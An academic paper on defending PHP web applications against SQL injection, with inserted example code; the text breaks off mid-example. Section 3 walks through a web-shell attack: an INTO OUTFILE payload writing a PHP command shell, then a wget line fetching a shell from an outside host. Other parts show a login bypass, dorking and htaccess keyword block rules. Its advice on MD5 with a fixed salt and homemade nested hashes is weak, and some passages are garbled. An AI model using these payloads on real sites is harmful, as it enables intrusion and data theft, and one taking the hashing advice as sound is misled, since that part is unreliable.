
Optimization of Multi-Agent Security Solution for Prevent Web-Based System of SQL Injection Attack

Mohammad Saeid Safaei Sadegh, Faraneh Zarafshan, Maryam Safari, Abouzar Rahimian

Department of computer engineering, Faculty of engineering, Ashtian Branch, Islamic Azad University, Ashtian, Markazi, Iran

4 Memorial University of Newfoundland, Canada

Abstract. In this paper, after a brief introduction to malicious SQL instructions against databases, we introduce multi-way measures to prevent infiltration into the database. Using some innovative ideas and a combination of algorithms, we try to close the paths of penetration and keep the attacker from displaying the information in the database.

An example Web scenario is given in PHP, and ways to penetrate it through an SQL attack are shown. Then, by reverse engineering the attacker's goals, the solution is designed to capture the traces the attacker leaves behind, so that the necessary measures can be taken to catch the attacker or to block the attacker's IP address.

Keywords: SQL Injection, Bug patching, Infiltration, Error, HTAccess, Logging

1. Introduction

Databases are usually the heart of a website or of a Web-based or Web-enabled program, because the information displayed on the site is stored in them. Depending on the programming model, a database is combined with a scripting or programming language, and possibly several other layers, to build a program that satisfies the customer and justifies the programming cost. [1]

As we know, thousands of exploits have been designed to threaten and ultimately attack web servers. Among these threats, SQL Injection has pulled ahead of its rivals as the most influential, the easiest and the most sophisticated. SQL Injection attacks are reported daily against a large number of web sites that provide dynamic information to their audience. Why dynamic sites? Their structure and design rely on MySQL or another SQL database, which makes them an attractive target. Since the SQL Injection attack is directly related to the database, preventing it, and following the rest of this article, requires a proper understanding of SQL.

Sometimes, even though all aspects of programming have been attended to, holes or errors remain in the program. If these holes are due to bugs in tools used by the program, such as the database, installing service packs or upgrading to a new version can solve the problem; but in most cases the holes in a Web application are bugs related to SQL Injection. This article therefore introduces the necessary measures to the reader by presenting innovative, multi-way methods to prevent these attacks. [2]

2. The concept of SQL Injection attack

SQL is the language used to work with a database management system such as MySQL. SQL Injection is a code injection method that exploits a security vulnerability in the database layer of an application. Although SQL Injection is most often used to attack websites, it can be used to attack any SQL database. In general, SQL Injection is a process by which hackers craft SQL commands and feed them to the database through the application's input forms to achieve their goals, which can include reading, deleting or changing data, and other actions. [3]

As you know, the SQL language contains commands that operate on database data, and each query can contain multiple commands. The most common are Select, Insert, Update, and Delete. An SQL Injection attack can therefore be defined as follows: if someone uses these commands to gain unauthorized access to our database, or to read, change or possibly delete information, and does so by exploiting the programmer's failure to separate user input from SQL commands, this unauthorized execution of SQL commands is called an SQL Injection attack. This vulnerability is among the top ten Web vulnerabilities in 2007 and 2010. [4]

3. Types of SQL Injection attacks to the database

The different reactions that databases show during injection have led to various types of injection over time. Here are some types of attacks.

Union Based SQL Injection. This injection combines two queries: the results of the two SQL commands are merged through UNION into a single result.

1. query.php?id=20 UNION SELECT 1,2,3,4,5

2. query.php?id=20

3. UNION

4. SELECT 1,2,3,4,5

In some database versions, such as MySQL version 5 and above, there is an additional table called Information Schema, which holds all system information, including the names of all tables and columns, and so speeds up the extraction of information: once Information_schema reveals that a table named admin exists with the two columns username and password, all that remains is to select the table's data and display its content. [5]

Error Based SQL Injection. In this type, the injection relies on the errors the database returns: instructions are injected so that the names of columns and tables are displayed in the form of an error, and that information is then used for further injection. [6]

Blind Based SQL Injection. In blind injection the database displays no information or error, and the hacker infers the results only from the True / False responses received from the database.

Blind injection can be divided into two categories:

Boolean Based. The results are True / False. If the page is displayed correctly after injection, the injected condition is True; if it is not displayed correctly, it is False.

Time Based. The results are True / False based on time. If, after injection, the page loads only after the delay set with a delay function (for example, 2 seconds), the condition is True; otherwise it is False.

Read and Write File. Some SQL functions allow reading a file from the system or writing a file of one's own onto the server.

Site / index.php? id = -7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 load_file

(/home/buscocas/www/login.php)29----

The result of this example is that PHP file codes are displayed on the web page, and if it encounters an error, the file

path can be encoded in hex.[7]

Site / index.php? id = -7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

load_file ( 0x2f686f6d652f627573636f6361732f7777772f6c6f67696e2e706870), 29—

The file creation operation is possible with the sql commands:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO

OUTFILE '/var/www/cmd.php '--

If an error occurs, we encode the path using hex:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO

OUTFILE '0x2f7661722f7777772f636d642e706870 '—

So far, a file named cmd.php has been created that allows us to run the command line with which we use the following

address to run it:

http://Site.com/cmd.php?cmd=ls

With this code, the file list is displayed in the root portion of the site, now we can download the shell or file to the

host via this command line.

http://Site.com/shell.php?cmd=wget http://mysite.com/shell.php

Here, the php file is downloaded from the path specified by the host and can be executed.

http://Site.com/shell.php

Note: The LOAD_FILE function is used to read and call existing files.

Note: You can create the contents of X into the specified file through into outfile. SELECT X INTO OUTFILE

'test.php'

Note: Ls and wget are Linux commands that are used to list files and download a file respectively.

4. Victim Selection (Destination Attack)

The first step in implementing an SQL Injection attack is to find a vulnerable website. This step may take the largest share of the total time needed for the attack, because today most websites protect themselves against SQL Injection threats with their own techniques. One of the easiest ways to find vulnerable websites is Google Dorking. A Dork is a specific search request that finds websites matching the parameters given in the request. Below are some examples of Dork, which can be used to find a site vulnerable to the SQL Injection attack. Just ask any of these requests within Google. [8]

The key to all these Dorks is that they focus on websites that generate dynamic content from an SQL database using PHP scripts. An SQL Injection attack works on any SQL database, but PHP-based websites are usually the more suitable targets, because they are used in every field and their databases usually hold the valuable information the hacker is after. Note that the websites a Dork returns are not necessarily vulnerable; each must be tested in the next step to determine which ones have the desired vulnerability. [9]

5. Penetration methods

To understand how this vulnerability works in practice, the following hypothetical address is considered:

www.site.com/page.php?id=5

At the above hypothetical address, the page.php?id=5 part feeds a query whose code is as follows:

// The id taken from the URL is pasted into the SQL text unchanged
$sql = "SELECT * FROM logs WHERE id = " . $_GET["id"];
$result = mysql_query($sql);

In the above code, the query is held in the $sql variable, which is executed through the mysql_query function, and the overall result is placed in the $result variable. The problem with this code is that the id parameter is taken from $_GET without any restriction. So the query behind the above address, before it runs, has the following form:

www.site.com/ SELECT * FROM logs WHERE id = 5

And when it's done in the url section of the site, the injection procedure is as follows:

www.site.com/SELECT * FROM log WHERE id = 5 union select null,

concat (user, password) from mysql.user-

The result of this injection is the disclosure of database users information. Of course, url is not the only way to do

this attack, and this attack can also be done through inputs such as a form or a cookie.

For example:

query = "SELECT * FROM users WHERE
uname= $_POST['Username']
AND
password= $_POST['Password'];

In this pseudo-code, the login is expected to succeed only when the username and password are entered correctly, but with a simple trick the username can be entered so that the login succeeds without the password being checked. Instead of a username and password, the following statement is entered:

'' OR 1 = '1' -

In this case, the SQL statement will run as follows:

SELECT * FROM users WHERE
uname='' OR 1='1' --
AND
password='';

In SQL, anything after -- is not executed, and 1 = 1 is an expression that is always true, so the user is verified. In this way, without a username and password and only by using SQL injection, the site's user interface can be entered.

6. Ways to Detect Vulnerabilities

To determine how vulnerable a website is to the SQL Injection attack, some of the points of infiltration can be examined, as described below.

Examining HTML Codes. The HTML code of the home page and of the other pages is examined, and the SQL injection test is performed on queries that appear as a link or as a data submission form.

about us

In the above codes, there is a link that can lead to an SQL query.

(site.com/about.php?id=2)

To perform the test, characters such as a quote are appended to the URL; if the page returns one of the known errors, it is vulnerable to SQL injection.

site.com/about.php?id=2 '

site.com/about.php?id=2 and 1 = 1

Known errors that indicate an SQL injection vulnerability in the various databases are as follows:

MYSQL. You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server

MSSQL. Unclosed quotation mark before the character string

ORACLE. ORA-01756: quoted string not properly terminated

ORA-00933: SQL command not properly ended

The reason for these errors is that input to the database is not restricted, so the extra characters are sent to the database along with the rest of the command.

Using Scanners. Using existing scanner software, you can scan the websites you want. One of the most famous scanners is the Acunetix Web Vulnerability Scanner.

Examining the HTTP header. When a site is opened in a web browser, the browser communicates with the server through the HTTP protocol, and an HTTP header is sent to the server alongside each request. When the server responds, a header is likewise placed next to the response to ensure that the connection is correct. This header contains fields, one of which is the HTTP code. [10][11]

7. Common Ways to Cope with SQL Injection

There are several ways to prevent such attacks in different programming languages, which are discussed in more detail below.

First, consider the following in designing and using the database:

1- As far as possible, connect to the database with users that have low access levels. This does not prevent SQL Injection, but it limits the malicious code someone can execute on the database, so that if an SQL Injection does occur the attacker has less room to maneuver.

2- Always store important information such as passwords in encrypted form in the database. This does not prevent SQL Injection, but it keeps information such as passwords from being obtained easily if an attacker penetrates the database.

3- Log the commands executed in the database. Although this does not help prevent SQL Injection, it allows the programmer to track down and fix errors by reviewing the executed commands. You can use a database that is able to log commands, or use the programming language to store them in a safe place.

8. Related Work To Prevent SQL Injection in PHP Programming

1. Ensure the correctness of the types of variables. PHP has a variety of variable types. You can check the type of an input using functions such as ctype_digit and ctype_alnum and the other functions of the ctype family, or the gettype function. You can also check the input against a regular expression (PCRE).

2. If a number is to be placed in the SQL statement, make sure the input is a number with a function such as is_numeric, or always convert the input with a function such as settype, intval or floatval.

3. Escape string inputs with the database's escaping function (such as mysql_real_escape_string or sqlite_escape_string or ...); if the database has no such function, use functions such as addslashes or str_replace. This keeps the ' character from affecting the structure of the SQL, so the input is treated as a value and does not change the command.

4. Using stored procedures is one of the best ways to prevent SQL Injection in databases that have this feature. Unfortunately, not all databases have it.

5. Database errors should never be shown to the user, because displaying them lets the attacker learn what happened in the database. PHP offers several ways to keep errors from being displayed. One of the best known is the @ operator placed before the instruction: when it is used, PHP ignores the error messages of that instruction. [12]

9. Optimization of SQL Injection Prevention Strategies in PHP Programming

Having reviewed the common ways to prevent malicious operations, we now present more innovative ways to address the issue. Note that none of the following methods can guarantee the security of the code on its own; multi-factor solutions and a combination of solutions should be used to enhance security.

9.1 Using Page 404 as a Trap

Technically, the 404 error is a client-side error that the user causes. It most often occurs when the user types the page address incorrectly or no page exists at the address typed. Another cause is that the page has been removed and the site owner has not redirected the old pages to the new ones. [13]

When a user clicks on a link whose page has been deleted, a 404 error results; for this reason it is best to redirect every deleted page to its associated page. Beyond that, the 404 page is also a way to stop Dorks being sent to pages: on a page that uses a GET parameter to fetch a specific record, the programmer redirects to 404 whenever the record is not found in the database. In addition to not displaying the SQL errors mentioned earlier, this presents a complete dead end to exploit robots such as Havij and .... To better understand, note the following:

Suppose the id value is sent to a page via $_GET.

$sql = "SELECT * FROM logs WHERE id = " . $_GET["id"];
$result = mysql_query($sql);

With only the above code, if the value of id does not correspond to a real record, the page itself still responds and, at best, displays a blank page; this leaves the hacker free to send other Dorks as ids. But changing the code above to:

$sql = "SELECT * FROM logs WHERE id = " . $_GET["id"];
$result = mysql_query($sql);
// No matching record: answer with the 404 page instead of a blank page or an SQL error
$num = mysql_num_rows($result);
if ($num == 0) { header('Location: /404.php'); exit; }

directs the visitor to page 404. Also, for higher security, further conditions can be set at the top of the PHP page, including:

9-1-1- Determining the data type. For example, the following statements ensure that the value received in the id variable is only a number.

// ctype_digit returns true or false, so it is used as the test, not as the value
if (!ctype_digit($_GET['id'])) { header('Location: /404.php'); exit; }
$id = (int) $_GET['id'];

9-1-2- Receiving multiple IDs. Receive the title of the requested article as well and compare it with the value of id to confirm that the page is correct; otherwise redirect to 404. For example: in addition to the value of id, the title (titr) of the article, or another identifier of it stored in the database, must also be received.

$id = (int) $_GET['id'];
$titr = mysql_real_escape_string($_GET['titr']);
$sql = "SELECT * FROM logs WHERE id = $id AND titr = '$titr'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) { header('Location: /404.php'); exit; }

9-1-3- Censoring suspicious characters. If the string received by $_GET['titr'] contains phrases with suspicious characters such as + or - or ..., censor it by deleting the suspicious characters and phrases.

For example:

$titr = addslashes($_GET['titr']);

This kind of solution is very useful for increasing the security of the web, but keep in mind that as security increases, the blogger's freedom in writing is restricted a little. For example, in the third model above, the blogger may not use phrases containing suspicious characters in the subject field and must, under the rules of the CMS, follow what the site designer has specified.
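The lookup from section 5 beside a version that applies steps 9-1-1 to 9-1-3 and answers every failure with the same 404, as an added example that is not the paper's code. It uses PDO with bound parameters on an in-memory SQLite table because the mysql_* functions were removed in PHP 7; the function names, the table contents and the request arrays are hypothetical.

```php
<?php
// Added example. Table contents and request arrays are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE logs (id INTEGER PRIMARY KEY, titr TEXT, body TEXT)');
$db->exec("INSERT INTO logs VALUES (5, 'release-notes', 'public post'),
                                   (6, 'draft-budget', 'unpublished post')");

// "Before": the id from the request is pasted into the SQL text, as in section 5.
function lookup_concat(PDO $db, array $get): array
{
    $sql = 'SELECT id, titr FROM logs WHERE id = ' . $get['id'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// "After": type check (9-1-1), second identifier (9-1-2), strict character set
// for the title (9-1-3), bound parameters, and one uniform 404 outcome (9.1).
function lookup_checked(PDO $db, array $get): array
{
    $notFound = ['status' => 404, 'row' => null];
    $id   = $get['id']   ?? '';
    $titr = $get['titr'] ?? '';

    // Requests such as ?id[]=5 arrive as arrays; treat them as not found.
    if (!is_string($id) || !is_string($titr)) {
        return $notFound;
    }
    // Digits only, and short enough to fit a 32-bit integer column.
    if (!ctype_digit($id) || strlen($id) > 9) {
        return $notFound;
    }
    // Allow-list for the title instead of deleting "suspicious" characters.
    if (!preg_match('/^[a-z0-9-]{1,64}$/', $titr)) {
        return $notFound;
    }

    try {
        $stmt = $db->prepare('SELECT id, titr, body FROM logs WHERE id = ? AND titr = ?');
        $stmt->execute([(int) $id, $titr]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Database errors go to the server log, never to the visitor.
        error_log('logs lookup failed: ' . $e->getMessage());
        return $notFound;
    }
    return $row === false ? $notFound : ['status' => 200, 'row' => $row];
}

// Constructed requests: one legitimate, four that must end at the 404 page.
$requests = [
    ['id' => '5',        'titr' => 'release-notes'], // legitimate
    ['id' => '5',        'titr' => 'wrong-title'],   // id exists, title does not match
    ['id' => '5 OR 1=1', 'titr' => 'release-notes'], // condition appended to the id
    ['id' => "5'",       'titr' => 'release-notes'], // quote probe from section 6
    ['id' => ['5'],      'titr' => 'release-notes'], // array instead of a string
];
foreach ($requests as $get) {
    $res = lookup_checked($db, $get);
    printf("%-48s -> %d\n", json_encode($get), $res['status']);
}

// In the concatenated version the appended condition becomes part of the
// WHERE clause, so the row count no longer depends on the id that was asked for.
$rows = lookup_concat($db, ['id' => '5 OR 1=1']);
printf("lookup_concat with appended condition: %d row(s)\n", count($rows));
```

In a real page the 404 status would be sent with http_response_code(404) or the redirect to /404.php shown above, before any output.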

Also, many users and even web designers may regard the 404 page as just another page of the site, but it can play an important security role. Site security experts check the number of requests from an IP that ended in the 404 page to gauge the chance that the site is being hacked. In simpler terms, if a particular IP sends a large number of requests to the server over a short period of time, resulting in code 404, it is very likely that an individual or malicious software behind that IP intends to hack the site. A domain owner must block these IPs so that attackers cannot access the site. There are many ready-made plugins available for this purpose on the Web, and their introduction and explanation is not within the scope of this article.
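One way to run the check described above over an Apache access log, as an added example that is not part of the paper: it counts 404 responses per IP inside a sliding time window and reports the addresses that exceed a limit. The function name, the window, the limit and the log lines are assumptions made for the example.

```php
<?php
// Added example. The access-log lines are constructed (documentation IP ranges);
// WINDOW and LIMIT are assumed values that must be tuned for the real site.
const WINDOW = 60; // length of the sliding window in seconds
const LIMIT  = 5;  // 404 responses tolerated per IP inside one window

// Scans Apache combined-format lines (assumed to be in chronological order) and
// returns [ip => largest number of 404s seen inside any one window] for the
// addresses that went over the limit.
function find_404_bursts(array $lines, int $window = WINDOW, int $limit = LIMIT): array
{
    // ip, ident, user, [timestamp], "request line" (may hold escaped quotes), status
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:[^"\\\\]|\\\\.)*" (\d{3}) /';
    $recent  = []; // ip => timestamps of 404s that are still inside the window
    $flagged = [];

    foreach ($lines as $line) {
        if (!preg_match($pattern, $line, $m) || $m[3] !== '404') {
            continue; // malformed line or a status we do not count
        }
        $time = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
        if ($time === false) {
            continue; // unparseable timestamp
        }
        $ip = $m[1];
        $ts = $time->getTimestamp();

        // Add this hit, then forget hits that have fallen out of the window.
        $recent[$ip][] = $ts;
        $recent[$ip] = array_values(array_filter(
            $recent[$ip],
            fn (int $seen): bool => $seen > $ts - $window
        ));

        $count = count($recent[$ip]);
        if ($count > $limit) {
            $flagged[$ip] = max($flagged[$ip] ?? 0, $count);
        }
    }
    return $flagged;
}

// Constructed log: one address walks through ids that do not exist, another
// follows a single stale link and then loads a normal page.
$lines = [];
for ($i = 0; $i < 8; $i++) {
    $lines[] = sprintf(
        '203.0.113.7 - - [10/Mar/2024:10:00:%02d +0000] "GET /page.php?id=%d HTTP/1.1" 404 512 "-" "-"',
        $i * 2,
        900 + $i
    );
}
$lines[] = '198.51.100.20 - - [10/Mar/2024:10:00:20 +0000] "GET /old-post.html HTTP/1.1" 404 512 "-" "-"';
$lines[] = '198.51.100.20 - - [10/Mar/2024:10:00:24 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "-"';

foreach (find_404_bursts($lines) as $ip => $count) {
    printf("%s sent %d requests ending in 404 within %d seconds\n", $ip, $count, WINDOW);
}
```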

In addition, the 404 page can be used to find and eliminate broken links, that is, links or URLs on the website that are unreachable or will not open. Broken links are considered a negative aspect of a site, and if they are not resolved they can damage it in the long run. Marketers should continually check for broken links and fix them before they can do harm. When a search engine crawler runs into a broken link, its crawl of the site comes to a halt, so search engines judge access to the site to be weak, which can hurt your SEO over time. [14]

9.2 Using the HTACCESS file

According to the official Apache website, .htaccess files (or distributed configuration files) provide a way to make configuration changes at the level of directories. Each .htaccess file contains one or more Apache commands called directives. Each .htaccess file is placed in a specific directory, and the directives inside it apply only to that directory and its subdirectories.

On web systems that are generally written in HTML or PHP and hosted on a Linux server, an .htaccess file is created to configure directories and folders on the Apache web server. This file is very useful when it comes to root access to control Apache.

The .htaccess file has no name and is identified only by the htaccess extension.

This file is known as a distributed configuration file. The things that can be done with it include:

Redirection control

Control physical access to files and folders

Controlling the display of Apache errors

URL Rewrite settings

Block one or more specific IPs or an IP range

Put a password on a specific folder

Cache Settings and Expire Date

Apply some changes to default PHP, MySQL, and Apache settings

Unblock to display all files or one or more files with a special extension

Move the pages to a specific page

Introducing a Default Document in a specific folder

Using this file is not recommended in all cases: besides its many capabilities, activating functions in it increases the exposure of a website to hacking, and hackers generally penetrate hosts through the functions enabled in the .htaccess file.

The settings in the .htaccess file apply to the current directory and its subfolders; placing another .htaccess file in a specific subfolder overrides the parent folder's settings there.

One of the uses of this file is URL Rewrite, whose most common use is to convert long URLs into addresses that are short and easily memorized. On IIS, you can also install the URL Rewrite plugin. In Apache this is known as mod_rewrite, and IIS calls it URL Rewrite. IIS has the ability to read and translate mod_rewrite code into URL Rewrite.

For example:

RewriteRule Home$ /first/second/index.php

The above command means that when Home is typed, the index.php file in the nested folders is run.

With a bit of care in this seemingly simple application, one can see its importance in the security issue.

For example, where the php file name should not be exposed for some reason, it can be hidden behind a RewriteRule.

Now consider the following example:

RewriteRule ^USERS-EDIT/([0-9]+)/(.*)$ /cms/user/useredit.php?id=$1 [L]

This command means that instead of passing the id value as a $_GET variable, the id is placed after a slash, followed by another slash and a deceptive statement.

For example,

x.com/USERS-EDIT/10/SomeText.html

follows exactly the same path as

x.com/cms/user/useredit.php?id=10

but with the difference that, first, the id is hidden; secondly, the path of the php file is unclear; and thirdly, by appending "SomeText.html" or any other words, the hacker is led down a false path and searches for a file with a suffix like html that does not exist in the web directory at all.

Also, a set of rules like those in the next example creates a censorship or dead end for Dorking against the site and virtually ties the hacker's hands for at least an SQL Injection exploit. [15]

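# mod_rewrite must be switched on before the conditions take effect
RewriteEngine On
# A quote, bracket or semicolon followed by an SQL keyword
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
# References back to the local host
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
#RewriteCond %{QUERY_STRING} ^.*\.[A-Za-z0-9].* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E).* [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC]
# Refuse the request when any condition above matched
RewriteRule .* - [F,L]
IndexIgnore *
Options -Indexes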
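A check worth running before deploying query-string rules like the ones above, as an added example that is not part of the paper: it applies the same expressions to constructed query strings and reports which condition rejects each one, including legitimate input that the filter also refuses. The function name and the sample query strings are hypothetical.

```php
<?php
// Added example. The patterns are the active RewriteCond expressions from the
// rules above, written without an empty alternative; [NC] becomes the i flag.
// The query strings are constructed samples.
$conds = [
    'special character followed by SQL keyword' =>
        '~^.*(;|<|>|\'|"|\)|%0A|%0D|%22|%27|%3C|%3E).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).*~i',
    'local host reference' =>
        '~^.*(localhost|loopback|127\.0\.0\.1).*~i',
    'quote or angle bracket' =>
        '~^.*(<|>|\'|%0A|%0D|%27|%3C|%3E).*~i',
    'script tag' =>
        '~(\<|%3C).*script.*(\>|%3E)~i',
];

// Returns the name of the first condition that matches, or null when the
// request would be let through. Apache matches QUERY_STRING undecoded, so the
// samples are written exactly as they appear in the request line.
function blocked_by(array $conds, string $queryString): ?string
{
    foreach ($conds as $name => $pattern) {
        if (preg_match($pattern, $queryString) === 1) {
            return $name;
        }
    }
    return null;
}

// Query string => what the visitor was actually doing.
$samples = [
    'id=10'                        => 'ordinary numeric id',
    'id=2%27'                      => 'quote probe from section 6',
    'name=O%27Brien'               => 'legitimate surname with an apostrophe',
    'sort=price;offset=20'         => 'legitimate parameters; "offset" contains "set"',
    'return=http://localhost/help' => 'legitimate link back to a local page',
    'q=a%3Cb'                      => 'legitimate search for the text a<b',
];

foreach ($samples as $queryString => $meaning) {
    $hit = blocked_by($conds, $queryString);
    printf(
        "%-30s %-5s %-42s (%s)\n",
        $queryString,
        $hit === null ? 'ALLOW' : 'BLOCK',
        $hit ?? '-',
        $meaning
    );
}
```

The legitimate samples that come back as BLOCK are the cost the paper mentions for this kind of censorship; the rules are a coarse outer filter and do not replace input checks in the PHP code.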

9-3. Usage of Hash Functions

Hash functions are a basic category of security science, also called one-way hash functions. A hash function receives an input string of arbitrary length and produces an output of constant length. The hash value is computed from the whole content of the text or input string and can be considered its digital fingerprint. Hash functions are an important tool in cryptography and play a key role in efficient and secure information processing; they are widely used in a large number of security protocols and mechanisms.

Hash functions are used to support digital signatures, and hash functions and compression functions are used in encryption for privacy and authentication.

Hash functions create a one-way encryption, which means that the hashed text cannot be turned back into the original. This property is useful for protecting users' passwords, so that the password is stored in the database as a hash. MD5 and SHA-1 are examples of hash functions. [16]

9-3-1. MD5. MD5 is widely used as a cryptographic hash function. The algorithm takes a string of arbitrary length as input and generates an MD5 message digest, or fingerprint, with a length of 128 bits. MD5 is a development of the MD4 algorithm, with the difference that MD5 is slightly slower than MD4 but its design is much more conservative.

MD5 was designed because it was felt that MD4 had been accepted for its high speed but did not have proper security in critical situations; MD5 is slower than MD4 in exchange for its security. The algorithm is the result of taking into account the views of a number of MD4 users, along with some changes in the structure of the algorithm to increase its speed and power. [17]

9-3-2. SHA1. SHA-1 is a hash function in the cryptographic category, designed by the National Security Agency in the United States and published by the National Institute of Standards and Technology. SHA-1 stands for Secure Hash Algorithm 1. There are currently three hashing algorithms from this group, with versions 0, 1 and 2.

The SHA-1 algorithm is very similar to SHA-0, but eliminates the basic issues that weakened version 0. Version 0 is used in a small number of security software applications and is not widely used, while version 2 of the algorithm is very different from versions 0 and 1. The Secure Hash Algorithm version 1 is currently the most popular hashing algorithm from this family and is used in many security software packages and security applications. In 2005, mathematical weaknesses were identified in this algorithm, which indicated that it might be broken, and since then there has been a need for a better algorithm in this area. Although this possibility has not yet become a reality, no successful attack has been made on this algorithm. SHA-2 is from some SHA-1. With this explanation, another algorithm is under development, with version 3, for which NIST is holding a competition like the previous ones, which will take place by the end of 2012, in order to select the best algorithm with this name. [18]

Having introduced hash functions, here is one example of their application. Suppose the password "123456" is stored in the user's password field, and suppose that, despite all the security considerations above, one page escaped the author's attention and was left without security measures, so that the attacker was able to use an exploit to access the database tables. If the attacker now sees the password 123456 next to the username admin, all of the programmer's effort to keep the website safe is lost, and the attacker can easily defeat the website after logging in through the login screen. To prevent this, the password must be stored in encrypted form in the database field, and the best solution is to use hash functions. For example:

// Escape the submitted values; the password is kept only as its MD5 hash
@$username = addslashes($_POST['username']);
@$password = md5(addslashes($_POST['password']));

Even with the above example, the security of the field still cannot be guaranteed, because hashed passwords stored in a database or operating system may sometimes fall into the hands of an attacker. Recovering the password is attractive to the attacker for several reasons. Instead of attacking the database tables, the attacker can simply log in to the system with the password and view or edit the necessary information. In some SQL Injection attacks the attacker can only view the information and cannot edit it (or at least cannot easily make custom edits to it), but if he can recover the password from its hash, he can easily enter the system. On some systems where security is very important and critical, some information (file / database) is encrypted with the same application password, so without knowing that password, access to the file or database is not necessarily useful. Some other systems have several admins. If any of them can discover another's password (from the hash that is available to him), he can log in as the other admin, carry out his own vandalism and have it recorded under the other admin's name. Most people reuse one password in several places; for example, their bank password is the same as their email password and their student password on the university site. If an attacker infiltrates the weak university site and discovers that person's password, he will probably be able to access that user's other accounts with the same password. There are methods for attacking hashes which, with the help of good hardware (such as leased supercomputers that perform complex calculations in a few seconds), can break weaker hashes (such as MD5) within a reasonable time (less than a week). That is why stronger functions such as SHA-512 are used today. Given the current situation, we need to further restrict the conditions under which the password can be disclosed, and we present two solutions here.

First solution - Use salt. In cryptography, a salt consists of random bits that form one of the inputs of a one-way function. The other input is usually a password or pass-phrase. The output of the one-way function can be stored instead of the password and used to authenticate users. The one-way function usually uses an iterative function. The salt can be combined with the password by a key derivation function such as PBKDF2 in order to generate a key for use with a cipher or other encryption algorithm. In the specific application of password authentication, the salt is stored with the output of the one-way function. Initially, Unix systems used a 12-bit salt, but current implementations use 48 to 128-bit salts. Previous versions of Unix used a password file (/etc/passwd) to store the hashes of salted passwords.

The point here is that in older versions of Unix, the salt was stored in cleartext in the passwd file together with the hash of the salted password. The password file was publicly readable by all users of the system. This file must be readable so that user-level software can find the username and other information. Therefore, password security is protected only by the one-way functions. [19]

In the more advanced shadow password system, password hashes and other security information are stored in a non-public file to reduce these concerns. However, this information remains relevant for installations of multiple servers that have a centralized password management system. Salt also protects against rainbow table attacks by extending the length of the password and increasing its complexity. If the rainbow tables do not cover that password length and complexity, the password will not be found. Even if it is found, the salt must be removed from the password before it can be used.

Salt also slows down dictionary attacks and brute-force attacks on passwords. Without salt, an attacker only needs to hash each guessed password once and compare it with all the hashes. With salt, the passwords are likely to have different salts, so every guess has to be hashed again for each salt, and computing all those hashes is very costly. [20]

Another advantage of salt appears when two users choose the same password, or one user uses the same password on two machines. Without salt, this password is stored as the same hash string in the password file. It is then obvious that the two accounts have the same password, and knowing the password of one account gives access to the other. With salt, the password is hashed together with two random characters, so the stored values differ even if two accounts use the same password, and neither can be detected even by reading the password files. The example above, optimized: [21]

@$username = addslashes($_POST['username']);
// Salt value appended to the password before hashing
$salt = '@#$%^&';
@$password = md5(addslashes($_POST['password'] . $salt));

Second solution - Use your own combination of functions in the hash. Because of the abundance of libraries for the md5 and sha1 functions, one of the most useful ways to handle a value posted as a password is to use your own combination of functions in the hash. For a better understanding, consider the following example:

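// Custom chain of md5/sha1 over the salted password ($passi); the parts are joined by string concatenation
@$password = md5(sha1(md5(md5($passi . $salt) . sha1($passi . $salt)) . md5($passi . $salt)));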

Of course, it should be noted that, for nested hashing, some scholars argue that it causes problems of non-interoperability between the functions and can sometimes reduce the value and strength of the encryption, but for a reasonable (not very large) number of steps in combining the hash functions this theory is rejected. At best, for encryption you can use separate dedicated servers that require authentication and use a specific hardware device connected to a server, such as YubiHSM; this method is recommended for those who currently have more than 100,000 users. [22]

Finally, it should be noted that cryptography should use a well-tested modern hash family such as SHA-3, Whirlpool, RipeMD, SHA512 or SHA256, or well-designed key stretching algorithms such as Bcrypt, PBKDF2 and Scrypt.
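The difference between the fixed-salt MD5 example above and a per-account random salt with key stretching (PBKDF2, bcrypt), as recommended at the end of this section, is shown in the following added example, which is not code from the original paper. The function names, the iteration count, the stored record layout and the sample accounts are assumptions made for illustration.

```php
<?php
// Added illustration; helper names, record layout and work factors are assumptions.

// The scheme from the example above: one fixed salt for every account, one MD5 pass.
function fixed_salt_md5(string $password): string
{
    return md5($password . '@#$%^&');
}

// Per-account random salt plus PBKDF2 key stretching. The salt is stored
// next to the hash, as the section describes for password authentication.
function pbkdf2_store(string $password, int $iterations = 600000): string
{
    $salt = random_bytes(16);                        // 128-bit random salt
    $hash = hash_pbkdf2('sha256', $password, $salt, $iterations, 32, true);
    return implode('$', ['pbkdf2-sha256', $iterations, bin2hex($salt), bin2hex($hash)]);
}

function pbkdf2_check(string $password, string $record): bool
{
    $parts = explode('$', $record);
    if (count($parts) !== 4 || $parts[0] !== 'pbkdf2-sha256'
        || !ctype_digit($parts[1]) || (int) $parts[1] < 1) {
        return false;                                // unknown or damaged record
    }
    $salt = @hex2bin($parts[2]);
    $want = @hex2bin($parts[3]);
    if ($salt === false || $want === false || $want === '') {
        return false;
    }
    $got = hash_pbkdf2('sha256', $password, $salt, (int) $parts[1], strlen($want), true);
    return hash_equals($want, $got);                 // constant-time comparison
}

// Constructed sample: two accounts that chose the same weak password.
$users = ['admin' => '123456', 'guest' => '123456'];

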